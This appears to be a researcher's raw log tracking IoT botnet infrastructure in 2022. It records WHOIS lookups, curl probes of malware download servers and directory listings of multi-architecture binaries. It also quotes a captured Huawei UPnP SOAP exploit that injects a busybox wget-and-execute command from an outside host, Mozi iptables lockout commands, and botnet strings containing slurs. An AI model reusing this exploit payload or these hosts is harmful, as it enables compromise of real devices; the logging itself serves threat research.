Z0Ly7roVx4rlfF3xEryYtRmGLjrOuNMtaudh5ALlSQEQlTm4bVScxavPRXVgepWBY1AR61sLePfbQCoQgwWNpu2tNGiMsjtiULqpV0AkiN5fED1SsU8leVNFKz1hBLUGZ3BnxTmdUFqscPKRJdwDklNHbJuX0O3FHbmFJV9xF1qFkDJbXrq8F6mpZisfJY06uggLs0RO0bUjfop3KM2t9XZJFJpVyYPV7xVQeVeO5V0AUPdtL7Y2roxmn2f5ZT8ixkrvyfPfe9AoaeqpEPLf7y9jhu0Np1Nb1zKsiHuVprjxUH6rbLmcq9ZCoq3W5HvOt5MvSfyamKhInoX2DmmPVSEDRyMpvtb2wz5P58hJM5kMY1j4uDNnBwWDQCoQrJK0hJgukr036xrWN2ge9zC6Cmo8mJqDx8M8KhxIFROffsNZsMj73vXy5LboSH9hZYLVQlcGAuqqI2CHO59yAmxGUykQUr9fntTy1SBrNNemqAEGDVlx6awHIvjrRstE925ycJ9fIYUvYLEZKjhwzaycQaigCxRP9Twh7itpvujdfRjm5IE65PvWFY0X2qwVxa3AvS0uiyPYPGA4L8Mje
inetnum: 201.150.160.0/19
status: allocated
aut-num: AS27839
owner: Comteco Ltda
ownerid: BO-COLT2-LACNIC
responsible: Marcos Peredo
address: Av. Ballivian, 713, -
address: -- - Cochabamba -
country: BO
phone: +591 44213372 [0000]
owner-c: MAP27
tech-c: MAP27
abuse-c: PES39
inetrev: 201.150.160.0/19
nserver: NS1.SUPERNET.COM.BO
nsstat: 20220708 AA
nslastaa: 20220708
nserver: NS.SUPERNET.COM.BO
nsstat: 20220708 AA
nslastaa: 20220708
created: 20140610
changed: 20190724
nic-hdl: MAP27
person: Marcos Peredo
e-mail: mperedo@comteco.com.bo
address: Av. Ballivian, 713, -
address: - - Cochabamba - Other
country: BO
phone: +591 70718065 [0000]
created: 20080618
changed: 20220404
nic-hdl: PES39
person: Percy Soliz
e-mail: abuso@supernet.com.bo
address: Av. Ballivian, 713, -
address: - - Cochabamba -
country: BO
phone: +591 44213540 [0000]
created: 20171010
changed: 20220606
$ curl -i http://201.150.180.187:51819
HTTP/1.1 200 OK
Server: nginx
Content-Length: 135784
Connection: close
Content-Type: application/zip
$ curl -i http://185.199.224.186:24875
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4574
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.466263079084456; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>HFS /</title>
HFS /
Messages
User
Login
Folder
[IMG] Home
0 folders, 3 files, 1.7 MBytes
Search
________________ [ go ]
Where to search (X) this folder and sub-folders
( ) this folder only
( ) entire server
Select
All Invert Mask
0 items selected
Actions
Archive Get list
Server information HttpFileServer 2.3m
Server time: 2022/7/11 0:03:09
Server uptime: (3 days) 01:19:37
Name.extension Size Timestamp Hits
[ ] [IMG] AV520.exe 590.7 KB 2022/1/24 21:09:30 8
[ ] [IMG] s 1.0 MB 2022/7/7 22:47:30 88
[ ] [IMG] s.exe 104.1 KB 2022/7/7 22:47:33 133
NetRange: 74.201.0.0 - 74.201.255.255
CIDR: 74.201.0.0/16
NetName: PNAP-10-2006
NetHandle: NET-74-201-0-0-1
Parent: NET74 (NET-74-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Internap Holding LLC (IC-1425)
RegDate: 2006-11-13
Updated: 2018-11-29
Ref: https://rdap.arin.net/registry/ip/74.201.0.0
OrgName: Internap Holding LLC
OrgId: IC-1425
Address: 250 Williams Street
Address: Suite E100
City: Atlanta
StateProv: GA
PostalCode: 30303
Country: US
RegDate: 2018-11-09
Updated: 2020-07-20
Ref: https://rdap.arin.net/registry/entity/IC-1425
$ curl -i http://74.201.28.102
HTTP/1.1 403 Forbidden
Date: Wed, 13 Jul 2022 01:32:59 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
Index of /idk
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] home.arc 2022-07-12 15:05 83K
[ ] home.arm 2022-07-12 15:05 35K
[ ] home.arm5 2022-07-12 15:05 31K
[ ] home.arm6 2022-07-12 15:05 40K
[ ] home.arm7 2022-07-12 15:05 60K
[ ] home.m68k 2022-07-12 15:05 104K
[ ] home.mips 2022-07-12 15:05 37K
[ ] home.mpsl 2022-07-12 15:05 38K
[ ] home.ppc 2022-07-12 15:05 34K
[ ] home.sh4 2022-07-12 15:05 95K
[ ] home.spc 2022-07-12 15:05 102K
[ ] home.x86 2022-07-12 15:05 36K
[ ] home.x86_64 2022-07-12 15:05 37K
══════════════════════════════════════════════════════════════
inetnum: 185.199.224.128 - 185.199.224.255
netname: H131
country: US
admin-c: FDL300-RIPE
tech-c: FDL300-RIPE
status: ASSIGNED PA
created: 2017-07-17T05:34:36Z
last-modified: 2021-10-14T12:10:24Z
source: RIPE
mnt-by: mnt-ca-heymman15-1
descr: LEE YONG
person: Heymman Servers Corporation
address: 800 Steeles Ave W, # B10182
address: Thornhill, Ontario L4J 7L2
address: Canada
phone: +1 438-495-6967
nic-hdl: FDL300-RIPE
mnt-by: mnt-ca-heymman9-1
created: 2018-11-02T15:20:22Z
last-modified: 2020-04-13T14:45:19Z
source: RIPE
$ curl -i http://185.199.224.186:24875
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4577
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.595595464576036; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>HFS /</title>
Messages
User
Login
Folder
[IMG] Home
0 folders, 3 files, 1.3 MBytes
Search
________________ [ go ]
Where to search (X) this folder and sub-folders
( ) this folder only
( ) entire server
Select
All Invert Mask
0 items selected
Actions
Archive Get list
Server information HttpFileServer 2.3m
Server time: 2022/7/13 9:37:37
Server uptime: (5 days) 10:54:05
Name.extension Size Timestamp Hits
[ ] [IMG] AV520.exe 187.8 KB 2022/7/11 20:44:58 201
[ ] [IMG] s 1.0 MB 2022/7/7 22:47:30 133
[ ] [IMG] s.exe 104.1 KB 2022/7/7 22:47:33 177
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
NetRange: 159.89.0.0 - 159.89.255.255
CIDR: 159.89.0.0/16
NetName: DIGITALOCEAN-159-89-0-0
NetHandle: NET-159-89-0-0-1
Parent: NET159 (NET-159-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS14061
Organization: DigitalOcean, LLC (DO-13)
RegDate: 2017-07-07
Updated: 2020-04-03
Comment: Routing and Peering Policy can be found at https://www.as14061.net
Comment:
Comment: Please submit abuse reports at https://www.digitalocean.com/company/contact/#abuse
Ref: https://rdap.arin.net/registry/ip/159.89.0.0
OrgName: DigitalOcean, LLC
OrgId: DO-13
Address: 101 Ave of the Americas
Address: FL2
City: New York
StateProv: NY
PostalCode: 10013
Country: US
RegDate: 2012-05-14
Updated: 2022-05-19
Ref: https://rdap.arin.net/registry/entity/DO-13
$ curl -i http://159.89.44.77
HTTP/1.1 403 Forbidden
Date: Sat, 20 Aug 2022 01:27:45 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Index of /idk
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] home.arc 2022-08-17 14:42 91K
[ ] home.arm 2022-08-17 14:42 37K
[ ] home.arm5 2022-08-17 14:42 33K
[ ] home.arm6 2022-08-17 14:42 43K
[ ] home.arm7 2022-08-17 14:42 63K
[ ] home.m68k 2022-08-17 14:42 108K
[ ] home.mips 2022-08-17 14:42 39K
[ ] home.mpsl 2022-08-17 14:42 40K
[ ] home.ppc 2022-08-17 14:42 36K
[ ] home.sh4 2022-08-17 14:42 103K
[ ] home.spc 2022-08-17 14:42 111K
[ ] home.x86 2022-08-17 14:42 38K
[ ] home.x86_64 2022-08-17 14:42 39K
══════════════════════════════════════════════════════════════
@fakamebotnet
/var/Sofia
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 193.233.193.12 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Server IP not responding above, can’t map it.
inetnum: 109.206.241.0 - 109.206.241.255
netname: NETERRA-SERVERION_BV-NET
country: NL
admin-c: SB27731-RIPE
abuse-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
created: 2022-06-28T09:01:54Z
last-modified: 2022-08-17T16:44:15Z
source: RIPE
role: Serverion B.V.
address: Krammer 8
address: 3232 HE Brielle
address: Netherlands
phone: +31851308333
org: ORG-DCB8-RIPE
abuse-mailbox: abuse@serverion.com
nic-hdl: SB27731-RIPE
mnt-by: mnt-com-serverion
created: 2020-03-17T15:49:34Z
last-modified: 2020-03-17T15:52:30Z
source: RIPE # Filtered
$ curl -i http://109.206.241.211/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 20 Aug 2022 01:33:00 GMT
Content-Type: text/html
Content-Length: 7
Last-Modified: Tue, 16 Aug 2022 17:37:30 GMT
Connection: keep-alive
ETag: "62fbd5da-7"
Accept-Ranges: bytes
adawdaw
inetnum: 95.214.52.0 - 95.214.55.255
netname: PL-MEV-20181221
country: PL
org: ORG-MSZO78-RIPE
admin-c: AO5423-RIPE
admin-c: KW3244-RIPE
tech-c: KW3244-RIPE
tech-c: AO5423-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-by: SKYTECH-MNT
created: 2018-12-21T13:47:11Z
last-modified: 2020-09-30T13:12:00Z
source: RIPE
organisation: ORG-MSZO78-RIPE
org-name: Meverywhere sp. z o.o.
country: PL
org-type: LIR
address: Milobedzka 35
address: 02-638
address: Warszawa
address: POLAND
phone: +48221004144
admin-c: AO5423-RIPE
tech-c: AO5423-RIPE
abuse-c: AR49979-RIPE
mnt-ref: SKYTECH-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: SKYTECH-MNT
created: 2018-12-20T08:55:28Z
last-modified: 2022-03-24T16:00:03Z
source: RIPE # Filtered
$ curl -i http://95.214.53.214
HTTP/1.1 200 OK
Date: Sat, 20 Aug 2022 01:54:35 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Wed, 03 Aug 2022 03:42:31 GMT
ETag: "2aa6-5e54e05d6de4a"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
NetRange: 159.223.0.0 - 159.223.255.255
CIDR: 159.223.0.0/16
NetName: DO-13
NetHandle: NET-159-223-0-0-1
Parent: NET159 (NET-159-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: DigitalOcean, LLC (DO-13)
RegDate: 2020-11-03
Updated: 2020-11-03
Ref: https://rdap.arin.net/registry/ip/159.223.0.0
OrgName: DigitalOcean, LLC
OrgId: DO-13
Address: 101 Ave of the Americas
Address: FL2
City: New York
StateProv: NY
PostalCode: 10013
Country: US
RegDate: 2012-05-14
Updated: 2022-05-19
Ref: https://rdap.arin.net/registry/entity/DO-13
$ curl -i http://159.223.13.188/
HTTP/1.1 200 OK
Date: Sat, 20 Aug 2022 01:58:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 10 Aug 2022 16:45:11 GMT
ETag: "0-5e5e5c5bc18fe"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Sat, 20 Aug 2022 01:58:55 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 10 Aug 2022 16:45:11 GMT
ETag: "0-5e5e5c5bc20ce"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 5.188.210.0 - 5.188.210.255
netname: DogHostNetwork
descr: Dedicated Servers & Hosting
country: RU
admin-c: BJA12-RIPE
org: ORG-BJA2-RIPE
tech-c: BJA12-RIPE
status: SUB-ALLOCATED PA
mnt-by: MNT-PINSUPPORT
created: 2018-07-22T18:47:38Z
last-modified: 2021-08-23T19:23:46Z
source: RIPE
organisation: ORG-BJA2-RIPE
org-name: Bashilov Jurij Alekseevich
org-type: OTHER
address: Data center: Russia, Saint-Petersburg, Sedova str. 80. PIN Co. LTD (ru.pin)
abuse-c: BJA13-RIPE
mnt-ref: MNT-PINSUPPORT
mnt-by: MNT-PINSUPPORT
created: 2015-12-17T21:42:47Z
last-modified: 2021-08-23T04:28:17Z
source: RIPE # Filtered
$ curl -i http://5.188.210.227/echo.php
HTTP/1.1 200 OK
Date: Sat, 20 Aug 2022 02:01:43 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.6.36
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Array
(
[HTTP_HOST] => 5.188.210.227
[HTTP_USER_AGENT] => curl/7.79.1
[HTTP_ACCEPT] => */*
[PATH] => /sbin:/usr/sbin:/bin:/usr/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.15 (CentOS) Server at 5.188.210.227 Port 80</address>
[SERVER_SOFTWARE] => Apache/2.2.15 (CentOS)
[SERVER_NAME] => 5.188.210.227
[SERVER_PORT] => 80
[REMOTE_ADDR] => ##bcable-redacted##
[SERVER_ADMIN] => root@localhost
[REMOTE_PORT] => 55620
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
[REQUEST_URI] => /echo.php
[SCRIPT_NAME] => /echo.php
[PHP_SELF] => /echo.php
[REQUEST_TIME_FLOAT] => 1660960903.037
[REQUEST_TIME] => 1660960903
[argv] => Array
(
)
[argc] => 0
)
FILL:
sDzENJ8v15lXm[.....etc......]
inetnum: 85.31.46.0 - 85.31.46.255
netname: NETERRA-SERVERION_BV-NET
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
created: 2022-06-28T09:01:53Z
last-modified: 2022-06-28T09:01:53Z
source: RIPE
role: Serverion B.V.
address: Krammer 8
address: 3232 HE Brielle
address: Netherlands
phone: +31851308333
org: ORG-DCB8-RIPE
abuse-mailbox: abuse@serverion.com
nic-hdl: SB27731-RIPE
mnt-by: mnt-com-serverion
created: 2020-03-17T15:49:34Z
last-modified: 2020-03-17T15:52:30Z
source: RIPE # Filtered
$ curl -i 85.31.46.211
HTTP/1.1 403 Forbidden
Date: Mon, 29 Aug 2022 04:09:22 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Index of /duck3k
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] home.arc 2022-08-26 09:01 91K
[ ] home.arm 2022-08-26 09:01 36K
[ ] home.arm5 2022-08-26 09:01 32K
[ ] home.arm6 2022-08-26 09:01 42K
[ ] home.arm7 2022-08-26 09:01 61K
[ ] home.m68k 2022-08-26 09:01 107K
[ ] home.mips 2022-08-26 09:01 38K
[ ] home.mpsl 2022-08-26 09:01 39K
[ ] home.ppc 2022-08-26 09:01 35K
[ ] home.sh4 2022-08-26 09:01 103K
[ ] home.spc 2022-08-26 09:01 110K
[ ] home.x86 2022-08-26 09:01 37K
[ ] home.x86_64 2022-08-26 09:01 38K
══════════════════════════════════════════════════════════════
inetnum: 123.128.0.0 - 123.135.255.255
netname: UNICOM-SD
descr: China Unicom Shandong Province Network
descr: China Unicom
country: CN
admin-c: CH1302-AP
tech-c: xz14-ap
status: ALLOCATED PORTABLE
remarks: service provider
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP
mnt-lower: MAINT-CNCGROUP-SD
mnt-routes: MAINT-CNCGROUP-RR
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
mnt-irt: IRT-CU-CN
last-modified: 2016-05-04T00:07:05Z
source: APNIC
irt: IRT-CU-CN
address: No.21,Financial Street
address: Beijing,100033
address: P.R.China
e-mail: hqs-ipabuse@chinaunicom.cn
abuse-mailbox: hqs-ipabuse@chinaunicom.cn
admin-c: CH1302-AP
tech-c: CH1302-AP
auth: # Filtered
mnt-by: MAINT-CNCGROUP
last-modified: 2017-10-23T05:59:13Z
source: APNIC
$ curl -i 123.130.176.197:42880/Mozi.m
HTTP/1.1 200 OK
Server: nginx
Content-Length: 307960
Connection: close
Content-Type: application/zip
Weird thing to find in the binary, blocks telnet and SSH via IPTables.
iptables -I INPUT -p tcp --destination-port 22 -j DROP
iptables -I INPUT -p tcp --destination-port 23 -j DROP
iptables -I INPUT -p tcp --destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp --source-port 22 -j DROP
iptables -I OUTPUT -p tcp --source-port 23 -j DROP
iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
iptables -I INPUT -p tcp --dport 22 -j DROP
iptables -I INPUT -p tcp --dport 23 -j DROP
iptables -I INPUT -p tcp --dport 2323 -j DROP
iptables -I OUTPUT -p tcp --sport 22 -j DROP
iptables -I OUTPUT -p tcp --sport 23 -j DROP
iptables -I OUTPUT -p tcp --sport 2323 -j DROP
killall -9 telnetd utelnetd scfgmgr
NetRange: 208.67.104.0 - 208.67.107.255
CIDR: 208.67.104.0/22
NetName: AS-DELIS
NetHandle: NET-208-67-104-0-1
Parent: NET208 (NET-208-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS211252
Organization: Serverion LLC (SL-2034)
RegDate: 2022-07-01
Updated: 2022-07-24
Comment: abuse@delis.one
Ref: https://rdap.arin.net/registry/ip/208.67.104.0
OrgName: Serverion LLC
OrgId: SL-2034
Address: 600 N. Broadstreet, Suite 5#3252
City: Middleton
StateProv: DE
PostalCode: 19709
Country: US
RegDate: 2020-08-10
Updated: 2022-07-24
Comment: Serverion NOC - https://noc.serverion.com
Comment: Looking Glass - https://lg.serverion.com
Comment: Information: https://www.serverion.com
Comment: https://as213035.net
Comment: Spam & Abuse - abuse@serverion.com
Comment: Peering - peering@serverion.com
Ref: https://rdap.arin.net/registry/entity/SL-2034
$ curl -i http://208.67.104.31/
HTTP/1.1 200 OK
Date: Sat, 03 Sep 2022 19:47:07 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 02 Sep 2022 07:22:58 GMT
ETag: "0-5e7ac996ea953"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://208.67.104.31/bins/
HTTP/1.1 200 OK
Date: Sat, 03 Sep 2022 19:46:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 02 Sep 2022 07:22:20 GMT
ETag: "0-5e7ac97356be4"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 5.181.80.0 - 5.181.80.255
netname: Tamatiya-EOOD
country: BG
org: ORG-IPTL2-RIPE
admin-c: PD8817-RIPE
mnt-routes: TAMATYA-MNT
mnt-domains: TAMATYA-MNT
tech-c: PD8817-RIPE
status: ASSIGNED PA
mnt-by: lir-bg-itserviceprovider-1-MNT
mnt-by: TAMATYA-MNT
mnt-by: MNT-LIR-BG
created: 2021-05-10T19:55:44Z
last-modified: 2021-12-08T08:52:36Z
source: RIPE
organisation: ORG-IPTL2-RIPE
org-name: Tamatiya EOOD
org-type: OTHER
address: 35, Ivan Vazov str., Sopot, Bulgaria
abuse-c: AR40280-RIPE
mnt-ref: TAMATYA-MNT
mnt-ref: MNT-LIR-BG
mnt-by: TAMATYA-MNT
created: 2014-10-22T22:11:46Z
last-modified: 2018-03-30T07:54:44Z
source: RIPE # Filtered
$ curl -i http://5.181.80.110/
HTTP/1.1 403 Forbidden
Date: Sat, 03 Sep 2022 19:50:26 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
botnet.psscc.cn. 528 IN A 81.161.229.46
inetnum: 81.161.229.0 - 81.161.229.255
netname: NETERRA-Serverion_BV-NET
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-MCONSULTING
mnt-by: MNT-MCONSULTING
created: 2022-04-21T12:52:01Z
last-modified: 2022-04-21T12:52:01Z
source: RIPE
role: Serverion B.V.
address: Krammer 8
address: 3232 HE Brielle
address: Netherlands
phone: +31851308333
org: ORG-DCB8-RIPE
abuse-mailbox: abuse@serverion.com
nic-hdl: SB27731-RIPE
mnt-by: mnt-com-serverion
created: 2020-03-17T15:49:34Z
last-modified: 2020-03-17T15:52:30Z
source: RIPE # Filtered
$ curl -i http://botnet.psscc.cn
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 02:35:32 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 08 Sep 2022 13:38:19 GMT
ETag: "0-5e82a8ade0ea2"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
http://botnet.psscc.cn/jaws
contained links to http://81.161.229.46/ma/meihao.[ARCH]
$ curl -i http://81.161.229.46/ma/
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 02:39:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 08 Sep 2022 13:38:19 GMT
ETag: "0-5e82a8ade1a5a"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 115.28.0.0 - 115.29.255.255
netname: ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country: CN
admin-c: ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
abuse-c: AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
last-modified: 2021-06-16T01:29:48Z
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
$ curl -i http://115.28.78.227:4477
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4918
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.091770235914737; path=/;
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>信息中心 /</title>
<link rel="stylesheet" href="/?mode=section&id=style.css" type="text/css">
<script type="text/javascript" src="/?mode=jquery"></script>
<link rel="shortcut icon" href="/favicon.ico">
<style class='trash-me'>
.onlyscript, button[onclick] { display:none; }
</style>
消息
用户
登录
目录
[IMG] 首页
0 个子目录, 4 个文件, 19.46 MB
搜索
________________ [ 确定 ]
搜索选项 (X) 包含子目录
( ) 仅在当前目录下搜索(不含子目录)
( ) 整个服务器
选择
全选 反选 通配符
0 项已选定
操作
打包下载 文件列表
服务器信息 HttpFileServer v2.3c 291 随波汉化版
服务器时间: 2022/9/10 10:48:15
在线时长: (2 天) 19:43:20
文件名.扩展名 大小(类型) 修改时间 点击量
[ ] [IMG] 360.exe 14.20 MB 2022/9/5 23:14:03 4
[ ] [IMG] 360kuandaicesu.zip 3.80 MB 2022/9/4 18:41:04 1
[ ] [IMG] FileSu.scr 208.00 KB 2022/9/5 23:42:20 103
[ ] [IMG] xxs 1.25 MB 2022/9/5 1:49:46 15
NetRange: 198.98.48.0 - 198.98.63.255
CIDR: 198.98.48.0/20
NetName: PONYNET-06
NetHandle: NET-198-98-48-0-1
Parent: NET198 (NET-198-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS53667
Organization: FranTech Solutions (SYNDI-5)
RegDate: 2012-07-05
Updated: 2012-07-05
Ref: https://rdap.arin.net/registry/ip/198.98.48.0
OrgName: FranTech Solutions
OrgId: SYNDI-5
Address: 1621 Central Ave
City: Cheyenne
StateProv: WY
PostalCode: 82001
Country: US
RegDate: 2010-07-21
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/SYNDI-5
$ curl -i http://198.98.49.79
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Sep 2022 02:01:53 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Thu, 11 Aug 2022 17:32:54 GMT
Connection: keep-alive
ETag: "62f53d46-264"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
Botnet Made By greek.Helios
hello
srhg
suckmadick
considertogoofflinetyvm
gooffline
ovhPwned
NfoPwned
skidripped
TaurusOnYaForhead
TaurusIsYoMomma
IWillNullYourToaster
YourMicrowaveIsAPieceofShit
OogaBoogaLanguage
KysFaggot
niggerssmell
niggersonyaforehead
23.254.230.120
/proc/
self
902i13
BzSxLxBxeY
HOHO-LUGO7
HOHO-U79OL
JuYfouyf87
NiGGeR69xd
SO190Ij1X
LOLKIKEEEDDE
ekjheory98e
scansh4
MDMA
fdevalvex
scanspc
MELTEDNINJAREALZ
flexsonskids
scanx86
MISAKI-U79OL
foAxi102kxe
swodjwodjwoj
MmKiy7f87l
freecookiex86
sysgpu
frgege
sysupdater
0DnAzepd
NiGGeRD0nks69
frgreu
0x766f6964
NiGGeRd0nks1337
gaft
urasgbsigboa
120i3UI49
OaF3
geae
vaiolmao
123123a
Ofurain0n4H34D
ggTrex
wasads
1293194hjXD
OthLaLosn
wget-log
1337SoraLOADER
SAIAKINA
ggtq
1378bfp919GRB1Q2
SAIAKUSO
ggtr
14Fa
SEXSLAVE1337
ggtt
1902a3u912u3u4
haetrghbr
19ju3d
SORAojkf120
hehahejeje92
2U2JDJA901F91
SlaVLav12
helpmedaddthhhhh
2wgg9qphbq
Slav3Th3seD3vices
hzSmYZjYMQ
5Gbf
sora
SoRAxD123LOL
iaGv
5aA3
SoRAxD420LOL
insomni
640277
SoraBeReppin1337
ipcamCache
66tlGg9Q
jUYfouyf87
6ke3
TOKYO3
lyEeaXul2dULCVxh
93OfjHZ2z
TY2gD6MZvKc7KU6r
mMkiy6f87l
A023UU4U24UIU
TheWeeknd
mioribitches
A5p9
TheWeeknds
mnblkjpoi
AbAd
Tokyos
Akiru
U8inTz
netstats
Alex
W9RCAKM20T
newnetword
Ayo215
Word
nloads
Wordmane
notyakuzaa
Belch
Wordnets
BigN0gg0r420
X0102I34f
